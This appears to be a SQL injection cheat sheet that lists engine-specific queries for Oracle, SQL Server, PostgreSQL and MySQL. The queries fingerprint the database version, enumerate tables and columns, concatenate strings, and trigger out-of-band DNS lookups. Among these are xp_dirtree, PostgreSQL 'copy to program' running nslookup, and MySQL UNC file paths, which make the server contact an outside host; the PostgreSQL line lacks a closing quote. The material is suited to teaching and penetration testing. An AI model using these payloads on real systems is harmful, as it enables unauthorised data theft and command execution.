Introduction

Once SQL injection has been identified, the next step is to enumerate the underlying database engine. Unfortunately, each database engine uses its own syntax for metadata, which makes this process highly engine-dependent.

Database Version

Database Version Info
Oracle SELECT banner FROM v$version
SELECT version FROM v$instance
Microsoft SELECT @@version
PostgreSQL SELECT version()
MySQL SELECT @@version

Database Contents

Listing tables and the columns they contain:

Database Contents Info
Oracle SELECT * FROM all_tables
SELECT * FROM all_tab_columns WHERE table_name = 'Table Name'
Microsoft SELECT * FROM information_schema.tables
SELECT * FROM information_schema.columns WHERE table_name = 'Table Name'
PostgreSQL SELECT * FROM information_schema.tables
SELECT * FROM information_schema.columns WHERE table_name = 'Table Name'
MySQL SELECT * FROM information_schema.tables
SELECT * FROM information_schema.columns WHERE table_name = 'Table Name'

String Concatenation

Database Concatenation
Oracle 'a'||'b'
Microsoft 'a'+'b'
PostgreSQL 'a'||'b'
MySQL 'a' 'b' (space) or CONCAT('a','b')

DNS Lookups

Database Lookup Syntax
Oracle SELECT UTL_INADDR.get_host_address('domain') - requires elevated privileges
Microsoft exec master..xp_dirtree '//domain/a'
PostgreSQL copy (SELECT '') to program 'nslookup domain
MySQL These work only on Windows
LOAD_FILE('\\\\domain\\a')
SELECT ... INTO OUTFILE '\\\\domain\a'